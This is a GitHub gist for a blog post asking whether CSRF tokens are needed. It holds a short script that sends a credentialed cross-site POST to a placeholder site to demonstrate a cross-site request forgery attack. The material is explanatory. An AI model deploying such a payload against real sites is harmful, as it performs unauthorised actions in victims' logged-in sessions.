Last active
May 7, 2017 21:04
-
-
Save SteveLTN/303f18d0864ade549b8b794494c50c0c to your computer and use it in GitHub Desktop.
Is CSRF Token Bogus? - blog post gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
const url = 'http://site.alice.com/posts' | |
fetch(url, { method: 'POST', credentials: 'include' }) | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment